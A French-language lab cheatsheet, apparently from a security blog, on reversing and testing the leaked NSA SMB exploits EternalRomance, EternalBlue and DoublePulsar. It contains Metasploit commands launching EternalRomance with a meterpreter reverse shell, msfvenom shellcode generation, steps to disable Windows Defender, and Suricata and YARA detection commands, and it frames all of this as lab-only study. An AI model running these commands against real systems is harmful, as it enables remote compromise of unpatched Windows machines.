# đ Pwn the NSA Cheatsheet
## PCtamalou.fr - Reverse-Engineering NSA Exploits
## Par Platon-Y, Nomade du Code
```
____ ___ ____ _ _______ ____
/ ___|_ _/ ___| |/ / ____| _ \
| | | | | | ' /| _| | | | |
| |___ | | |___| . \| |___| |_| |
\____|____\____|_|\_\_____|____/
```
Yo, Apache ! Ce cheatsheet est ton katana de poche pour *Pwn the NSA*. Il condense les commandes, outils, et scripts pour reverse *EternalRomance*, *EternalSynergy*, *FuzzBunch*, *DoublePulsar*, et tester *EternalBlue 2025*. Lab only (192.168.56.0/24, article 323-1 CP). Signe le contrat Ă©thique : [/nsa-reverse/contrat_ethique.txt](https://pctamalou.fr/nsa-reverse/contrat_ethique.txt). Ready ? đ
---
## 1. Lab Setup
| Action | Commande |
|-----------------------|-----------------------------------------------|
| **Kali (192.168.56.100)** | `sudo ip addr add 192.168.56.100/24 dev eth0` |
| **Win7 (192.168.56.101)** | `New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.56.101 -PrefixLength 24` |
| **WinServer2016 (192.168.56.102)** | `New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.56.102 -PrefixLength 24` |
| **Win10 (192.168.56.103)** | `New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.56.103 -PrefixLength 24` |
| **Win11 (192.168.56.104)** | `New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.56.104 -PrefixLength 24` |
| **Vérifier connectivité** | `ping 192.168.56.101` (depuis Kali) |
| **Désactiver Defender** | `sc stop WinDefend` (sur chaque Windows) |
| **Activer SMBv1 (Win7/Server)** | `Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol` |
| **Snapshot VMs** | VirtualBox : File > Take Snapshot |
**Note** : Internal Network, no Internet. Update lab_inventory.txt.
---
## 2. Outils
| Outil | Installation | Usage |
|----------------------|-----------------------------------------------|--------------------------------------------|
| **Metasploit** | `sudo apt install metasploit-framework` | Lancer exploits (`msfconsole`) |
| **Ghidra** | Télécharge : https://ghidra-sre.org/ | Reverse statique (`DoublePulsar.dll`) |
| **Radare2** | `sudo apt install radare2` | Désassembler shellcode (`r2 shellcode.bin`) |
| **Immunity Debugger** | Télécharge : https://www.immunityinc.com (Win7) | Débogage dynamique (`lsass.exe`) |
| **WinDbg** | Windows SDK : https://developer.microsoft.com | Débogage kernel (`kd -kl`) |
| **Scapy** | `pip3 install scapy` | Paquets SMB (`eternalromance.py`) |
| **Wireshark** | `sudo apt install wireshark` | Capture SMB (`tcp.port == 445`) |
| **Suricata** | `sudo apt install suricata` | IDS (`suricata -r smb.pcap`) |
| **YARA** | `sudo apt install yara` | Détection shellcode (`yara yara_eternal.yar`) |
| **Atomic Red Team** | `git clone https://github.com/redcanaryco/atomic-red-team` | Tests (`Invoke-EternalBlue.ps1`) |
---
## 3. Exploits
### EternalRomance (Win7)
```bash
# Metasploit
msf6 > use exploit/windows/smb/ms17_010_eternalromance
set RHOSTS 192.168.56.101
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.100
set LPORT 4444
exploit
# Custom
python3 /nsa-reverse/resources/eternalromance.py
```
### EternalBlue 2025 (Server2016, Win10, Win11)
```bash
# Modifier target/smb_version dans eternalblue_2025.py
python3 /nsa-reverse/resources/eternalblue_2025.py
```
---
## 4. Détection
### DoublePulsar
```bash
python3 /nsa-reverse/resources/doublepulsar_detect.py
# Vérifie : cat doublepulsar.log
```
### Suricata
```bash
sudo suricata -c /etc/suricata/suricata.yaml -r /tmp/smb.pcap
cat /var/log/suricata/fast.log
```
### YARA
```bash
yara /nsa-reverse/resources/yara_eternal.yar shellcode.bin
```
---
## 5. Reverse
| Action | Commande |
|-----------------------|-----------------------------------------------|
| **Ghidra** | Importe `DoublePulsar.dll` : `File > Import` |
| **Radare2** | `r2 -AAA -d shellcode.bin; afl; pdf @ sym.execute_payload` |
| **Immunity Debugger** | Attache `lsass.exe`, `bp srv!SrvOs2FeaListToNt` |
| **WinDbg** | `kd -kl; !process 0 0 lsass.exe; bp srv!SrvOs2FeaListToNt; g` |
---
## 6. Shellcode
```bash
# Générer
msfvenom -p windows/x64/exec CMD=cmd.exe -f raw -o shellcode.bin
# Intégrer dans eternalromance.py
shellcode = open('shellcode.bin', 'rb').read()
# Tester
python3 /nsa-reverse/resources/eternalromance.py
```
---
## 7. Dépannage
| ProblĂšme | Solution |
|-------------------------|-----------------------------------------------|
| **EternalRomance échoue** | Vérifie SMBv1 : `sc.exe query lanmanworkstation`
Active : `net start lanmanserver`
Check patchs : `wmic qfe list | findstr "KB4012212 KB4012215"` |
| **Ghidra sans fonctions** | `Analyze > Auto Analyze`, coche "Aggressive Instruction Finder"
Cherche strings : `Window > Defined Strings` |
| **Suricata sans alertes** | Vérifie config : `/etc/suricata/suricata.yaml`
Teste PCAP : `suricata -r smb.pcap` |
| **EternalBlue 2025 échoue** | Vérifie SMB : `Get-SmbServerConfiguration`
Redémarre : `Restart-Service LanmanServer`
Check EDR : `sc query WinDefend` |
---
## 8. Fichiers
- [/nsa-reverse/resources/eternalromance.py](https://pctamalou.fr/nsa-reverse/resources/eternalromance.py)
- [/nsa-reverse/resources/doublepulsar_detect.py](https://pctamalou.fr/nsa-reverse/resources/doublepulsar_detect.py)
- [/nsa-reverse/resources/suricata.rules](https://pctamalou.fr/nsa-reverse/resources/suricata.rules)
- [/nsa-reverse/resources/yara_eternal.yar](https://pctamalou.fr/nsa-reverse/resources/yara_eternal.yar)
- [/nsa-reverse/resources/shellcode.bin.txt](https://pctamalou.fr/nsa-reverse/resources/shellcode.bin.txt)
- [/nsa-reverse/resources/eternalblue_2025.py](https://pctamalou.fr/nsa-reverse/resources/eternalblue_2025.py)
---
## 9. Ăthique
Lab only ! Signe [/nsa-reverse/contrat_ethique.txt](https://pctamalou.fr/nsa-reverse/contrat_ethique.txt). Hors lab = 7 ans de prison, 100 000 ⏠dâamende (art. 323-1 CP).
---
*âOne shot, one kill : sois prĂ©cis, sois Ă©thique.â*
â Platon-Y, PCtamalou.fr